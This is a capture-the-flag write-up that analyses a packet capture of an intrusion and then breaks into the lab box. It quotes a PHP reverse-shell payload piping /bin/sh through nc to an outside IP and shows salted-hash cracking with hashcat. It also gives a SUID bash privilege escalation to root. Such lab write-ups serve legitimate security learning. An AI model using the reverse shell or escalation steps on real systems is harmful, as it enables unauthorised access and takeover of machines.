What payload did the attacker use to gain access?
<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
What password did the attacker use to privesc?
How did the attacker establish persistence?
Using the fasttrack wordlist, how many of the system passwords were crackable?
What’s the default hash for the backdoor?
(MAKE SURE YOU CLONE THE GITHUB REPOSITORY OF SSH BACKDOOR FIRST and then open the main.go file)
What’s the hardcoded salt for the backdoor?
What was the hash that the attacker used? — go back to the PCAP for this!
Crack the hash using rockyou and a cracking tool of your choice. What’s the password?
If you open the main.go file and read the hashpassword function, you will find that it computes SHA-512 over the password followed by the salt.
Simply using john or CrackStation won't help, because they do not know about the salt. Therefore we look for the format sha512($pass.$salt) in hashcat's help output using the command
hashcat --help, which lists all usage, and we find it under mode number 1710 (sha512($pass.$salt)), so we use that.
Basically, this is the command we use:
hashcat -m 1710 -a 0 -o outputfile.txt hashfile.txt passwordlist.txt
The hash file, which in my case is heshh.txt, must contain a single line of the form
password hash:hardcoded salt
(If you are confused, look at the answers above)
Once it's done, we get our cracked password in the output file (crackpass.txt in my case), and the password is november16.
The attacker defaced the website. What message did they leave as a heading?
H4ck3d by CooctusClan
Now this part was a bit confusing. I tried to run the ./backdoor command (as left by the attacker in the PCAP file) but I was unable to get in.
After an nmap scan I saw that ports 22 and 2222 were open and running SSH. I tried connecting to port 22 using both the password november16 and whenevernoteartinstant but was not able to get in.
However, if you connect to SSH on port 2222, using the -p option to specify the port, we can get in.
The user flag can be found in the /home/james directory.
I tried looking around in /var/www/html, which often contains juicy information and configuration files, and I found this in index.html; however, this info was not useful.
We run sudo -l to see all the commands we can execute, however it asks for a password, so let's move on.
Now run ls -la to see all files and we immediately see an executable bash file, shown in red, named .suid_bash which is owned by root. You can also try running linpeas or running the find command, as I did, to find SUID files.
We can also go to the GTFOBins website, search "bash" and click on the SUID option since we have a bash SUID file,
and we immediately see the command ./bash -p
Basically, the -p option tells bash not to drop its effective user ID back to the real user ID on startup, so the SUID copy keeps running with the privileges of its effective user (root).
Run the command ./.suid_bash -p
and it will spawn a bash shell. Now change directory to /root and view the root flag: cd /root and then cat root.txt
This was a pretty fun room and different from the general ones, and I hope you learned from this writeup. - ZEUS